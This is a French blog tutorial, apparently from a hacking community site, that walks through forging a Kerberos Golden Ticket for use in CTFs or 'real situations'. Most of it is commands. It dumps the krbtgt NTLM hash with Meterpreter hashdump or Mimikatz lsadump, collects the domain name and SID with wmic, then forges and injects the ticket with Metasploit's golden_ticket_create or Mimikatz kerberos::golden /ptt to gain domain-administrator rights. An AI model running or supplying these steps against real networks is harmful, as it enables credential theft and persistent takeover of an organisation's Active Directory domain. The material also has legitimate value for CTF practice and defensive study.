Bonjour à tous.

Lors d’un CTF ou d’une situation réelle, il est probable que vous ayez à créer un Ticket d’Or (ce qui m’est arrivé récemment). Ayant plutôt galérer à comprendre les articles (en anglais), j’ai décidé de vous expliquer et de vous montrer de la manière la plus simple possible comment créer un Golden Ticket.

Pour générer un Ticket d’Or, nous avons besoin d’un reverse/bind shell (de préférence Meterpretrer) et :

  • du nom du compte admin : Administrateur / Administrator
  • du domaine : hackingcommunity.local (par exemple)
  • du hash NTLM du compte krbtgt
  • et du SID du domaine

1 – Domaine

Pour récupérer le domaine, rien de bien dur; on utilise la commande:

wmic computersystem get domain

Si vous testez cette commande sur votre PC perso, voici la réponse que vous devriez avoir en théorie :

Le domaine de votre compte utilisateur est donc “WORKGROUP” (celui par défaut). Bref, nous voilà maintenant en possession du domaine.

2 – Hash NTLM de krbtgt

Pour obtenir le hash NTLM du compte krbtgt, si vous disposez d’un shell Meterpreter, vous n’avez cas lancer Hashdump:

meterpreter > hashdump

Vous devriez avoir une sortie dans ce genre :

krbtgt:502:[HASH NTLM]:::

Sinon, vous pouvez utiliser Mimikatz pour le recupérer :

meterpreter > load kiwi
privilege::debug 
lsadump::lsa /inject /name:krbtgt

Cela va vous permettre de retourner non seulement : Le hash NTML, le SID et le domaine complet : gain de temps !

3 – SID du domaine

Et voici comment obtenir le SID d’un domaine :

wmic useraccount get name,sid

La sortie :

Administrateur S-1-5-21-**********-**********-**********-500
Invité S-1-5-21-**********-**********-**********-501

Au final, vous n’aurez pas besoin de la dernière partie (ex: -500 / -501).

Le format du SID est le suivant :

^S-\d-\d+-(\d+-){1,14}\d+$

4 – Création du Ticket d’Or

Il est maintenant temps de créer notre fameux ticket d’or. Dans un premier temps nous allons voir comment le créer avec Metasploit et nous verrons ensuite comment le créer avec Mimikatz.

1 – Metasploit

load kiwi # On charge mimikatz

kerberos_ticket_purge # On purge les tickets kerberos de la session courrante

golden_ticket_create -k [HASH KRBTGT] -s [SID] -u [administrateur/administrator] -t [répertoire vers lequel le GT va être enregistré] /root/gt.gt -d [DOMAINE]

kerberos_ticket_user /root/gt.gt # On utilise le Golden Ticket

2 – Mimikatz

mimikatz # kerberos::golden /user:[Administrator/Administrateur] /krbtgt:[HASH KRBTGT] /domain:[DOMAINE] /sid:[SID] /ptt # On créer puis submit le token

Vous voilà maintenant admin 🙂

Published by Aku

Laisser un commentaire

Hacking/Coding Fr

127 User(s) Online Join Server
  • Ghorkun
  • Dying Inside
  • BenK
  • AnonTek
  • !SKPZ
  • NicoHay
  • Yir
  • Сорок два Бесконечность
  • nimae
  • Adekya
  • Kaito
  • Aexyn